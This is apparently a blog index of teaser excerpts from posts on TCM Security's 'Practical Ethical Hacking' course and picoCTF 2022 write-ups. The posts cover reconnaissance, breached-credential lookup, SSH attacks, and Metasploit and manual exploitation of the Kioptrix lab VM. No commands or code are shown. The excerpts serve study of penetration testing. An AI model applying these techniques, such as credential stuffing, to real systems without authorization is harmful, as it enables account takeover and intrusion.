Credential stuffing means taking breached credentials (e.g. from Breach Parse or website like weleakinfo.to – before it was seized by law enforcement) and trying to use them to log in to an account on a target.

Weiter lesen...

Attacking SSH is not easy. There are three approaches if we want to try it anyway: we can try to find login credentials by brute force or by weak or default credentials.

Weiter lesen...

After gaining root with MetaSploit, we will gain access to the Kioptrix machine with manual exploitation in this video, using the vulnerability of mod_ssl and an exploit called Open*uck.

Weiter lesen...

This is the culmination point of the previous lessons of PEH, the first popped shell, using MetaSploit on the Samba 2.2.1a vulnerability on port 139 (“trans2open”, remote buffer overflow).

Weiter lesen...

A payload is code that is sent to a target machine to exploit a vulnerability and get a shell on that machine. There are different types of payloads: Windows payloads, Linux payloads, Meterpreter payload, Python payload, etc. They can be staged and non-staged.

Weiter lesen...

The nmap scan has revealed that SSH (OpenSSH 2.9p2) runs on the open port 22. If our scan does not show a software version, we can try to figure it out by connecting to the open port with ssh.

Weiter lesen...

Nessus is a vulnerability scanner, a tool that is frequently used in penetration testing. It might even be the first tool that one uses in an external assessment.

Weiter lesen...

This is the first section of the “Exploitation Basics” chapter.

In this section, different ways of “popping a shell”, which means getting access to a terminal on a target machine, will be discussed. In particular, the differences between a Reverse Shell and a Bind Shell will be discussed.

Weiter lesen...

This blog is about identifying and researching potential vulnerabilities, starting from the results that we have found for Kioptrix so far.

Weiter lesen...

SMB (Server Message Block) is a file-sharing protocol used in networks to up- and download files to a shared folder. SMB is typically used in work and internal environments.

Weiter lesen...

In this section, the open ports found with the Nmap scan are examined more closely, and additional information about services running on the webserver and sub-directories of the webpage are identified with a tool called dirbuster.

Weiter lesen...

In this section, we will learn how to use Nmap to scan a target machine for open ports and services running on the machine that can be exploited in the following step.

Weiter lesen...

This is the beginning of the “Scanning and Enumeration” section of “Practical Ethical Hacking”. We will use a vulnerable virtual machine called Kioptrix.

Weiter lesen...

Websites liked Linkedin or Twitter can deliver valuable information, too, e.g. badge photos or desk photos.

Weiter lesen...

Google is a super helpful source of information for pentesters that makes a successful pentester.

Weiter lesen...

Burp Suite is a web proxy. It can intercept web traffic for us. The Community Edition has a limited functionality, one can only select Temporary Project upon startup, then click on Start burp (using the Burp defaults).

Weiter lesen...

One of the first steps in reconnaissance is to find out which subdomains belong to the target. One reason is that one might find subdomains which should not be publicly accessible, e.g. dev.tesla.com, another reason is that it gives us a chance to attack multiple websites and not only one.

Weiter lesen...

In this lecture, TCM presents several tools to analyse which technologies and frameworks have been used to create a website.

Weiter lesen...

TCM demonstrates a website called DeHashed.com, which is only available as a paid service and can only be paid in cryptocurrency.

Weiter lesen...

Finding user names and passwords in breached credentials is a very important step and part of every pentest.

Weiter lesen...

Use notekeeping tools to write key information down for later referral. Write down the actual commands and take screenshots!

Weiter lesen...

Passive reconnaissance means gathering information that is already available on the internet, whereas active scanning begins with scanning of hosts.

Weiter lesen...

To find a client that we can attack (legally) to practice reconnaissance, we use the public bugbounty program bugcrowd.com.

Weiter lesen...

In this part, it will be demonstrated how one can find and verify email addresses as a part of reconnaissance on a target.

Weiter lesen...

This is part of the “Introduction to Python” module of TCM Sec’s “Practical Ethical Hacking” course. I have left out most of the material, which covers a basic introduction to Python. The rest is an application of Python for network programming.

Weiter lesen...

The five stages of ethical hacking are the same, irrespective if you hack into a network or a website:

Weiter lesen...

This post is based on TCM Sec’s “Practical Ethical Hacking” course. It is the last topic in the “Introduction to Linux” chapter.

Weiter lesen...

The following notes are based on TCM Security’s ‘Practical Ethical Hacking’. They refer to the Kali Linux operating system.

Weiter lesen...

The following notes are based on TCM Security’s ‘Practical Ethical Hacking’. They provide a short refresher of the most important concepts of networks.

Weiter lesen...

Another challenge from picoCTF 2022, worth 200 points.

Weiter lesen...

Another CTF challenge from picoCTF 2022 for 200 points.

Weiter lesen...

Another challenge from picoCTF 2022, worth 200 points.

Weiter lesen...

Another challenge form picoCTF 2022 worth 100 points:

Weiter lesen...

The following challenge was part of the picoCTF 2022 contest, a SQL injection, worth 300 points:

Weiter lesen...

This is my first writeup about a CTF challenge. The following was the first task in the 100’s (i.e. lowest) category of the 2022 picoCTF challenge:

Weiter lesen...

Hi! My name is Andreas, I am from Germany. Let me share a few words about what happened so far…

Weiter lesen...